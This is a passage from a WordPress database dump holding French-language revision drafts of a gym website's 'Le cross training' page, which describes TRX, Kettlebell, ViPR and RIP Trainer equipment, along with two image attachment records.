traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:46:19', '2013-06-16 10:46:19', '', 22, 'http://www.crosstrainingcenter.be/?p=59', 0, 'revision', '', 0),
(63, 1, '2013-06-16 10:53:44', '2013-06-16 10:53:44', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:53:44', '2013-06-16 10:53:44', '', 22, 'http://www.crosstrainingcenter.be/?p=63', 0, 'revision', '', 0),
(60, 1, '2013-06-16 10:48:24', '2013-06-16 10:48:24', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:48:24', '2013-06-16 10:48:24', '', 22, 'http://www.crosstrainingcenter.be/?p=60', 0, 'revision', '', 0),
(61, 1, '2013-06-16 10:49:30', '2013-06-16 10:49:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:30', '2013-06-16 10:49:30', '', 22, 'http://www.crosstrainingcenter.be/?p=61', 0, 'revision', '', 0),
(62, 1, '2013-06-16 10:49:53', '2013-06-16 10:49:53', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:1px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:1px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:53', '2013-06-16 10:49:53', '', 22, 'http://www.crosstrainingcenter.be/?p=62', 0, 'revision', '', 0),
(64, 1, '2013-06-16 10:55:17', '2013-06-16 10:55:17', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:55:17', '2013-06-16 10:55:17', '', 22, 'http://www.crosstrainingcenter.be/?p=64', 0, 'revision', '', 0),
(65, 1, '2013-06-16 10:57:04', '2013-06-16 10:57:04', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:57:04', '2013-06-16 10:57:04', '', 22, 'http://www.crosstrainingcenter.be/?p=65', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(66, 1, '2013-06-16 10:59:52', '2013-06-16 10:59:52', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:59:52', '2013-06-16 10:59:52', '', 22, 'http://www.crosstrainingcenter.be/?p=66', 0, 'revision', '', 0),
(67, 1, '2013-06-16 11:03:08', '2013-06-16 11:03:08', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>Kettlebel</h1>Outil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>ViPR</h1>Acronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>RIP Trainer</h1>Le Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:08', '2013-06-16 11:03:08', '', 22, 'http://www.crosstrainingcenter.be/?p=67', 0, 'revision', '', 0),
(68, 1, '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 'trx1', '', 'inherit', 'open', 'open', '', 'trx1', '', '', '2013-06-16 11:10:26', '2013-06-16 11:10:26', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg', 0, 'attachment', 'image/jpeg', 0),
(69, 1, '2013-06-16 11:03:19', '2013-06-16 11:03:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\">imgimgimg</td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:03:19', '2013-06-16 11:03:19', '', 22, 'http://www.crosstrainingcenter.be/?p=69', 0, 'revision', '', 0),
(70, 1, '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 'kb', '', 'inherit', 'open', 'open', '', 'kb', '', '', '2013-06-16 11:13:51', '2013-06-16 11:13:51', '', 22, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg', 0, 'attachment', 'image/jpeg', 0),
